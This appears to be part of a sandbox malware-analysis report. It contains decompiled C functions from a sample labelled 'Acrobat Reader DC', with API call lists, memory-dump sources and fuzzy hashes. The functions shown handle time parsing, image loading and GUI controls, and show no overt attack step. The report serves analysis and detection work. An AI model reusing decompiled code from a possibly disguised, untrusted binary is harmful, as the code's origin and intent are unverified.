                                  				WORD _t48;
                                  				WORD _t52;
                                  				short _t60;
                                  				void* _t61;
                                  				WORD _t64;
                                  				void* _t65;
                                  				WORD _t68;
                                  				void* _t69;
                                  				signed int _t70;
                                  				void* _t71;
                                  				struct _SYSTEMTIME* _t85;
                                  				short* _t86;
                                  				void* _t87;
                                  				void* _t89;
                                  				void* _t90;
                                  
                                  				_t70 = _a16;
                                  				_t86 = _a4;
                                  				_t85 = _a8;
                                  				GetLocalTime(_t85);
                                  				if( *_t86 == 0) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					_t43 = E004111C1(_t86);
                                  					_t90 = _t89 + 4;
                                  					if(_t43 < 4) {
                                  						goto L12;
                                  					} else {
                                  						if(_a12 != 0) {
                                  							E00412FBA( &_v16, _t86, 4);
                                  							_push( &_v16);
                                  							_v8 = 0;
                                  							_t60 = E00413190();
                                  							_t86 = _t86 + 8 + _t70 * 2;
                                  							_t85->wYear = _t60;
                                  							_t61 = E004111C1(_t86);
                                  							_t90 = _t90 + 0x14;
                                  							if(_t61 >= 2) {
                                  								E00412FBA( &_v16, _t86, 2);
                                  								_push( &_v16);
                                  								_v12 = 0;
                                  								_t64 = E00413190();
                                  								_t86 = _t86 + 4 + _t70 * 2;
                                  								_t85->wMonth = _t64;
                                  								_t65 = E004111C1(_t86);
                                  								_t90 = _t90 + 0x14;
                                  								if(_t65 >= 2) {
                                  									E00412FBA( &_v16, _t86, 2);
                                  									_push( &_v16);
                                  									_v12 = 0;
                                  									_t68 = E00413190();
                                  									_t86 = _t86 + 4;
                                  									_t85->wDay = _t68;
                                  									_t69 = E004111C1(_t86);
                                  									_t90 = _t90 + 0x14;
                                  									if(_t69 != 0) {
                                  										_t86 = _t86 + _t70 * 2;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						if(E004111C1(_t86) >= 2) {
                                  							E00412FBA( &_v16, _t86, 2);
                                  							_push( &_v16);
                                  							_v12 = 0;
                                  							_t48 = E00413190();
                                  							_t87 = _t86 + 4 + _t70 * 2;
                                  							_t85->wHour = _t48;
                                  							_t71 = _t70 + _t70 + 4;
                                  							if(E004111C1(_t87) >= 2) {
                                  								E00412FBA( &_v16, _t87, 2);
                                  								_push( &_v16);
                                  								_v12 = 0;
                                  								_t52 = E00413190();
                                  								_t88 = _t87 + _t71;
                                  								_t85->wMinute = _t52;
                                  								if(E004111C1(_t87 + _t71) >= 2) {
                                  									E00412FBA( &_v16, _t88, 2);
                                  									_push( &_v16);
                                  									_v12 = 0;
                                  									_t85->wSecond = E00413190();
                                  									_t85->wMilliseconds = 0;
                                  								}
                                  							}
                                  						}
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                  • String ID:
                                  • API String ID: 461458858-0
                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0043009D(struct HWND__** _a4, void* _a8, int* _a12, int* _a16) {
                                  				int _v8;
                                  				void* _v12;
                                  				long _v16;
                                  				int _v32;
                                  				int _v36;
                                  				void _v40;
                                  				WCHAR* _t27;
                                  				void* _t28;
                                  				long _t29;
                                  				intOrPtr* _t42;
                                  				intOrPtr* _t46;
                                  				int* _t50;
                                  				int _t53;
                                  				long _t57;
                                  				int* _t63;
                                  				void* _t76;
                                  				struct HWND__** _t79;
                                  				struct HWND__* _t80;
                                  				void* _t82;
                                  
                                  				_t27 = _a8;
                                  				if( *_t27 == 0) {
                                  					_a8 = 0;
                                  					goto L10;
                                  				} else {
                                  					_t76 = CreateFileW(_t27, 0x80000000, 0, 0, 3, 0, 0);
                                  					if(_t76 != 0xffffffff) {
                                  						_t57 = GetFileSize(_t76, 0);
                                  						_t82 = GlobalAlloc(2, _t57);
                                  						if(_t82 == 0) {
                                  							goto L2;
                                  						} else {
                                  							ReadFile(_t76, GlobalLock(_t82), _t57,  &_v16, 0);
                                  							GlobalUnlock(_t82);
                                  							CloseHandle(_t76);
                                  							__imp__CreateStreamOnHGlobal(_t82, 1,  &_v12);
                                  							_v8 = 0;
                                  							__imp__#418(_v12, 0, 0, 0x4829f8,  &_v8);
                                  							_t42 = _v12;
                                  							 *((intOrPtr*)( *((intOrPtr*)( *_t42 + 8))))(_t42);
                                  							GlobalFree(_t82);
                                  							_t46 = _v8;
                                  							if(_t46 == 0) {
                                  								goto L2;
                                  							} else {
                                  								 *((intOrPtr*)( *((intOrPtr*)( *_t46 + 0xc))))(_t46,  &_a8);
                                  								GetObjectW(_a8, 0x18,  &_v40);
                                  								_t63 = _a12;
                                  								_t50 = _a16;
                                  								if( *_t63 == 0 &&  *_t50 == 0) {
                                  									 *_t63 = _v36;
                                  									 *_t50 = _v32;
                                  								}
                                  								_a8 = CopyImage(_a8, 0,  *_t63,  *_t50, 0x2000);
                                  								_t53 = _v8;
                                  								 *((intOrPtr*)( *((intOrPtr*)( *_t53 + 8))))(_t53);
                                  								L10:
                                  								_t79 = _a4;
                                  								_t28 = _t79[0x18];
                                  								if(_t28 != 0) {
                                  									DeleteObject(_t28);
                                  								}
                                  								_t29 = _a8;
                                  								_t79[0x18] = _t29;
                                  								_t80 =  *_t79;
                                  								SendMessageW(_t80, 0x172, 0, _t29);
                                  								return _t80;
                                  							}
                                  						}
                                  					} else {
                                  						L2:
                                  						return 0;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                  • GlobalLock.KERNEL32 ref: 004300F6
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                  • GlobalFree.KERNEL32 ref: 00430150
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                  • CopyImage.USER32 ref: 004301A8
                                  • DeleteObject.GDI32(?), ref: 004301D0
                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                  • String ID:
                                  • API String ID: 3969911579-0
                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00445BE4(void* __eflags, struct HWND__** _a4, intOrPtr* _a8) {
                                  				short _v520;
                                  				void* __edi;
                                  				void* _t12;
                                  				void* _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  				struct HWND__* _t23;
                                  				intOrPtr* _t27;
                                  
                                  				_t27 = _a8;
                                  				_t23 = GetParent( *_a4);
                                  				GetClassNameW(_t23,  &_v520, 0x100);
                                  				if(E0041313C( &_v520, L"SHELLDLL_DefView") != 0) {
                                  					return 0;
                                  				} else {
                                  					_t12 = E004114AB(_t23,  *_t27, L"largeicons");
                                  					if(_t12 != 0) {
                                  						_t14 = E004114AB(_t23,  *_t27, L"details");
                                  						if(_t14 != 0) {
                                  							_t16 = E004114AB(_t23,  *_t27, L"smallicons");
                                  							if(_t16 != 0) {
                                  								_t17 = E004114AB(_t23,  *_t27, L"list");
                                  								if(_t17 == 0) {
                                  									_push(_t17);
                                  									_push(0x702b);
                                  									goto L10;
                                  								}
                                  							} else {
                                  								_push(_t16);
                                  								_push(0x702a);
                                  								goto L10;
                                  							}
                                  						} else {
                                  							_push(_t14);
                                  							_push(0x702c);
                                  							goto L10;
                                  						}
                                  					} else {
                                  						_push(_t12);
                                  						_push(0x7029);
                                  						L10:
                                  						SendMessageW(_t23, 0x111, ??, ??);
                                  					}
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 3125838495-3381328864
                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E004491B9(void* __eflags, void* __fp0, WCHAR* _a4, signed int _a6, signed int _a8, long _a12) {
                                  				int _v12;
                                  				int _v16;
                                  				int _v20;
                                  				int _v24;
                                  				signed int _v28;
                                  				int _v32;
                                  				long _v52;
                                  				long _v64;
                                  				long _v68;
                                  				int _v72;
                                  				char _v88;
                                  				WCHAR* _v108;
                                  				void* _v120;
                                  				struct tagMENUITEMINFOW _v168;
                                  				WCHAR* _v184;
                                  				void* _v192;
                                  				long _v208;
                                  				void* _v220;
                                  				long _v244;
                                  				long _v256;
                                  				int _v260;
                                  				void* _v8456;
                                  				signed int _t138;
                                  				struct HWND__** _t159;
                                  				intOrPtr _t161;
                                  				intOrPtr _t168;
                                  				long _t169;
                                  				struct HWND__* _t175;
                                  				WCHAR* _t176;
                                  
                                  				E00422240(0x2108);
                                  				_t176 = _a8;
                                  				_v24 = 0;
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				_v20 = 0;
                                  				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_v28) == 0) {
                                  					L13:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t161 =  *0x4a8690; // 0x0
                                  					_t168 =  *0x4a86a4; // 0xa51ad0
                                  					_t159 =  *( *(_t168 + _v28 * 4));
                                  					_t138 = _t159[0x22] & 0x000000ff;
                                  					_t175 =  *_t159;
                                  					_a8 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + _a8 * 4))));
                                  					if(_t138 > 3) {
                                  						_t169 = _a12;
                                  						__eflags = _t169;
                                  						if(__eflags == 0) {
                                  							goto L7;
                                  						} else {
                                  							__eflags =  *_t169;
                                  							if(__eflags != 0) {
                                  								goto L13;
                                  							} else {
                                  								goto L7;
                                  							}
                                  						}
                                  					} else {
                                  						switch( *((intOrPtr*)(_t138 * 4 +  &M004497C5))) {
                                  							case 0:
                                  								_v24 = 0x143;
                                  								_v16 = 0x158;
                                  								_v12 = 0x14e;
                                  								_v20 = 0x14b;
                                  								goto L7;
                                  							case 1:
                                  								_v24 = 0x180;
                                  								_v16 = 0x1a2;
                                  								_v12 = 0x186;
                                  								_v20 = 0x184;
                                  								goto L7;
                                  							case 2:
                                  								L7:
                                  								if(_t138 > 0x1c) {
                                  									L66:
                                  									__eflags = _t176;
                                  									if(_t176 == 0) {
                                  										goto L10;
                                  									} else {
                                  										_t140 = SetWindowTextW(_t175, _t176);
                                  										__eflags = _t140;
                                  										if(_t140 == 0) {
                                  											goto L13;
                                  										} else {
                                  											E00430B87(_a8, _t159, 1);
                                  											goto L69;
                                  										}
                                  									}
                                  								} else {
                                  									switch( *((intOrPtr*)(( *(_t138 + 0x44980d) & 0x000000ff) * 4 +  &M004497D5))) {
                                  										case 0:
                                  											if(_t176 != 0) {
                                  												_t144 = SendMessageW(_t175, _v16, 0xffffffff, _t176);
                                  												__eflags = _t144 - 0xffffffff;
                                  												if(_t144 == 0xffffffff) {
                                  													_t145 =  *_t176 & 0x0000ffff;
                                  													_a4 = _t176;
                                  													__eflags = _t145 -  *0x4a8644; // 0x7c
                                  													if(__eflags == 0) {
                                  														L16:
                                  														_a4 = CharNextW(_t176);
                                  														SendMessageW(_t175, _v20, 0, 0);
                                  													} else {
                                  														__eflags = _t145;
                                  														if(__eflags != 0) {
                                  															while(1) {
                                  																L18:
                                  																__eflags = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
                                  																if(__eflags == 0) {
                                  																	break;
                                  																}
                                  																SendMessageW(_t175, _v24, 0,  &_v8456);
                                  															}
                                  															_t150 = _a12;
                                  															__eflags = _t150;
                                  															if(_t150 == 0) {
                                  																goto L69;
                                  															} else {
                                  																_t151 = SendMessageW(_t175, _v16, 0xffffffff, _t150);
                                  																__eflags = _t151 - 0xffffffff;
                                  																if(_t151 == 0xffffffff) {
                                  																	goto L69;
                                  																} else {
                                  																	SendMessageW(_t175, _v12, _t151, 0);
                                  																	return 1;
                                  																}
                                  															}
                                  															goto L70;
                                  														} else {
                                  															goto L16;
                                  														}
                                  													}
                                  													goto L18;
                                  												} else {
                                  													SendMessageW(_t175, _v12, _t144, 0);
                                  													E00430B87(_a8, _t159, 1);
                                  													goto L13;
                                  												}
                                  											} else {
                                  												goto L10;
                                  											}
                                  											goto L70;
                                  										case 1:
                                  											__eax = _a12;
                                  											__eflags = __eax;
                                  											if(__eax == 0) {
                                  												L29:
                                  												SetWindowTextW(__edi, __esi) = SendMessageW(__edi, 0xb1, 0xf4240, 0xf423f);
                                  												_a8[0x72] = 0xffffffff;
                                  												__eax = 1;
                                  												return 1;
                                  											} else {
                                  												__eflags =  *__eax;
                                  												if( *__eax == 0) {
                                  													goto L29;
                                  												} else {
                                  													SendMessageW(__edi, 0xc2, 1, __esi) = 1;
                                  													return 1;
                                  												}
                                  											}
                                  											goto L70;
                                  										case 2:
                                  											 &_v88 = E00432A10(__ecx, __esi,  &_v88, 1, 1);
                                  											__ecx =  &_v88;
                                  											_push( &_v88);
                                  											goto L31;
                                  										case 3:
                                  											L10:
                                  											return _t138 | 0xffffffff;
                                  											goto L70;
                                  										case 4:
                                  											__eax = E00413BED(__esi);
                                  											asm("fnstcw word [ebp+0xa]");
                                  											__eax = _a6 & 0x0000ffff;
                                  											__eax = _a6 & 0x0000ffff | 0x00000c00;
                                  											__eflags = __eax;
                                  											_a12 = __eax;
                                  											__esp = __esp + 4;
                                  											asm("fldcw word [ebp+0x10]");
                                  											asm("fistp qword [ebp-0x1c]");
                                  											__ecx = _v32;
                                  											asm("fldcw word [ebp+0xa]");
                                  											SendMessageW(__edi, 0x402, _v32, 0) = 1;
                                  											return 1;
                                  											goto L70;
                                  										case 5:
                                  											 &_v220 =  *(__ecx + 0x18c);
                                  											_v220 = 1;
                                  											_v208 = __esi;
                                  											__eax = SendMessageW( *(__ecx + 0x18c), 0x133d,  *(__ebx + 0x8b) & 0x000000ff,  &_v220);
                                  											__eflags = __eax;
                                  											if(__eax == 0) {
                                  												goto L13;
                                  											} else {
                                  												__eflags =  *(__ebx + 0x8b) - 0xff;
                                  												if( *(__ebx + 0x8b) == 0xff) {
                                  													goto L69;
                                  												} else {
                                  													__ecx = _a8;
                                  													InvalidateRect( *_a8, 0, 1) = 1;
                                  													return 1;
                                  												}
                                  											}
                                  											goto L70;
                                  										case 6:
                                  											_push(0x208);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx = _a4;
                                  											__esp = __esp + 4;
                                  											__edi = __eax;
                                  											__eax =  &_v168;
                                  											_v168.cbSize = 0x30;
                                  											_v168.fMask = 0x10;
                                  											_v168.dwTypeData = __edi;
                                  											_v168.cch = 0x104;
                                  											__eax = GetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
                                  											__eflags = __eax;
                                  											if(__eax == 0) {
                                  												L65:
                                  												_push(__edi);
                                  												__eax = E004111DC();
                                  												__esp = __esp + 4;
                                  												__eax = 0;
                                  												__eflags = 0;
                                  												return 0;
                                  											} else {
                                  												__eflags = _v168.fType & 0x00000800;
                                  												if((_v168.fType & 0x00000800) != 0) {
                                  													goto L65;
                                  												} else {
                                  													__ecx = _a4;
                                  													__eax =  &_v168;
                                  													_v168.dwTypeData = __esi;
                                  													__eax = SetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														goto L65;
                                  													} else {
                                  														__eax = _a8;
                                  														__ecx =  *_a8;
                                  														__eax = DrawMenuBar( *_a8);
                                  														_push(__edi);
                                  														__eax = E004111DC();
                                  														__esp = __esp + 4;
                                  														__eax = 1;
                                  														return 1;
                                  													}
                                  												}
                                  											}
                                  											goto L70;
                                  										case 7:
                                  											__eax =  *(__ebx + 0xc);
                                  											__ecx =  &_v260;
                                  											_push( &_v260);
                                  											_push(0);
                                  											_push(0x113f);
                                  											_v260 = 1;
                                  											_v256 =  *(__ebx + 0xc);
                                  											_v244 = __esi;
                                  											_push( *(__ebx + 0x30));
                                  											goto L33;
                                  										case 8:
                                  											__eax = E00413BED(__esi);
                                  											__eax = 1;
                                  											return 1;
                                  											goto L70;
                                  										case 9:
                                  											__eflags = __esi;
                                  											if(__esi == 0) {
                                  												goto L10;
                                  											} else {
                                  												__ecx =  &_v120;
                                  												__eax = E00412F40( &_v120, 0, 0x20);
                                  												__ebx = 0;
                                  												__eflags = 0;
                                  												_a4 = __esi;
                                  												while(1) {
                                  													 &_v8456 = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
                                  													__eflags = __al;
                                  													if(__al == 0) {
                                  														break;
                                  													}
                                  													__eflags = _v8456;
                                  													__ecx =  &_v8456;
                                  													_v120 = 4;
                                  													_v108 =  &_v8456;
                                  													if(__eflags == 0) {
                                  														L42:
                                  														__ebx =  &(__ebx->i);
                                  														continue;
                                  													} else {
                                  														__eflags = SendMessageW(__edi, 0x1060, __ebx,  &_v120);
                                  														if(__eflags == 0) {
                                  															goto L13;
                                  														} else {
                                  															goto L42;
                                  														}
                                  													}
                                  													goto L70;
                                  												}
                                  												__eax = E004111C1(__esi);
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													L45:
                                  													__ecx = _a4;
                                  													_push( &_v120);
                                  													_push(__ebx);
                                  													_v108 = _a4;
                                  													_push(0x1060);
                                  													goto L32;
                                  												} else {
                                  													__eax = E004111C1(__esi);
                                  													__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
                                  													if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
                                  														goto L69;
                                  													} else {
                                  														goto L45;
                                  													}
                                  												}
                                  											}
                                  											goto L70;
                                  										case 0xa:
                                  											__ebx =  *(__ebx + 0x30);
                                  											__eflags = __esi;
                                  											if(__esi == 0) {
                                  												goto L10;
                                  											} else {
                                  												 &_v72 = E00412F40( &_v72, 0, 0x28);
                                  												__ecx = _a4;
                                  												__edi = SendMessageW;
                                  												_v192 = 1;
                                  												_v184 = _a4;
                                  												__eax = SendMessageW(__ebx, 0x1053, 0xffffffff,  &_v192);
                                  												_v68 = __eax;
                                  												__eflags = __eax - 0xffffffff;
                                  												if(__eflags == 0) {
                                  													goto L13;
                                  												} else {
                                  													_a12 = 0;
                                  													_a4 = __esi;
                                  													while(1) {
                                  														__eax =  &_a4;
                                  														__ecx =  &_v8456;
                                  														__eax = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
                                  														__eflags = __al;
                                  														if(__al == 0) {
                                  															break;
                                  														}
                                  														__eflags = _v8456;
                                  														__ecx = _a12;
                                  														__eax = 1;
                                  														_v72 = 1;
                                  														_v52 =  &_v8456;
                                  														_v64 = _a12;
                                  														if(__eflags == 0) {
                                  															L53:
                                  															_a12 = _a12 + __eax;
                                  															continue;
                                  														} else {
                                  															__eax = _v68;
                                  															_push( &_v72);
                                  															_push(_v68);
                                  															_push(0x1074);
                                  															_push(__ebx);
                                  															__eax = __edi->i();
                                  															__eflags = _v68;
                                  															if(__eflags == 0) {
                                  																goto L13;
                                  															} else {
                                  																__eax = 1;
                                  																goto L53;
                                  															}
                                  														}
                                  														goto L70;
                                  													}
                                  													__eax = E004111C1(__esi);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														L56:
                                  														__eax = _a12;
                                  														__ecx =  &_v72;
                                  														_push( &_v72);
                                  														_v52 = _a4;
                                  														_push(_v68);
                                  														_push(0x1074);
                                  														_push(__ebx);
                                  														_v64 = _a12;
                                  														__eax = __edi->i();
                                  														goto L34;
                                  													} else {
                                  														__eax = E004111C1(__esi);
                                  														__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
                                  														if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
                                  															goto L69;
                                  														} else {
                                  															goto L56;
                                  														}
                                  													}
                                  												}
                                  											}
                                  											goto L70;
                                  										case 0xb:
                                  											__eax = E00413BED(__esi);
                                  											 *(__ebx + 0x48) = __eax;
                                  											__eax = 1;
                                  											return 1;
                                  											goto L70;
                                  										case 0xc:
                                  											E00432A10(__ecx, __esi,  &_v88, 1, 1) =  &_v88;
                                  											_push( &_v88);
                                  											L31:
                                  											_push(0);
                                  											_push(0x1002);
                                  											L32:
                                  											_push(__edi);
                                  											L33:
                                  											__eax = SendMessageW();
                                  											L34:
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												L69:
                                  												return 1;
                                  											} else {
                                  												return __eax;
                                  											}
                                  											goto L70;
                                  										case 0xd:
                                  											goto L66;
                                  									}
                                  								}
                                  								goto L70;
                                  						}
                                  					}
                                  				}
                                  				L70:
                                  			}

































                                  APIs
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CharNext
                                  • String ID:
                                  • API String ID: 1350042424-0
                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E0045E737(void* __fp0, struct HINSTANCE__* _a4, int _a8, intOrPtr _a12) {
                                  				WCHAR* _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v52;
                                  				char _v68;
                                  				WCHAR* _v84;
                                  				short _v8280;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				struct HINSTANCE__* _t51;
                                  				intOrPtr _t96;
                                  				WCHAR* _t100;
                                  				WCHAR* _t118;
                                  				intOrPtr _t119;
                                  				intOrPtr _t129;
                                  				intOrPtr _t131;
                                  				struct HINSTANCE__* _t132;
                                  				void* _t146;
                                  
                                  				_t146 = __fp0;
                                  				_t51 = E00422240(0x2058);
                                  				if( *0x4974e2 == 0) {
                                  					_t51 = _a4;
                                  					_t138 =  *((intOrPtr*)(_t51 + 0xf8)) - 1;
                                  					if( *((intOrPtr*)(_t51 + 0xf8)) != 1) {
                                  						LoadStringW( *0x497520, 0x66,  &_v8280, 0xfff);
                                  						_t118 =  &_v8280;
                                  						E00401B10(_t118,  &_v84, _t138);
                                  						_t111 =  *0x497520;
                                  						LoadStringW( *0x497520, _a8, _t118, 0xfff);
                                  						E00401B10(_t118,  &_v68, _t138);
                                  						_t129 =  *((intOrPtr*)(_a4 + 0xf4));
                                  						_v36 = E004348DE(_t129);
                                  						_t119 = E004348AA(_t129);
                                  						_v28 = _t119;
                                  						_t96 = E00434908(E0043492F(_t129));
                                  						_v32 = _t96;
                                  						_t100 =  &_v8280;
                                  						_t139 = _t96;
                                  						if(_t96 == 0) {
                                  							_t111 = _a4;
                                  							_push( *((intOrPtr*)(_a4 + 0xc8)));
                                  							_push(_t129);
                                  						} else {
                                  							_push(_t96);
                                  							_push(_t119);
                                  						}
                                  						_push(L"Line %d  (File \"%s\"):\n\n");
                                  						_push(_t100);
                                  						E0041329B(_t111);
                                  						E00401B10( &_v8280,  &_v24, _t139);
                                  						_t131 = _v36;
                                  						_t140 = _t131;
                                  						if(_t131 != 0) {
                                  							E0040D200( &_v24, _t100, _t131, _t146);
                                  							E0040D200( &_v24, _t100, "\n", _t146);
                                  						}
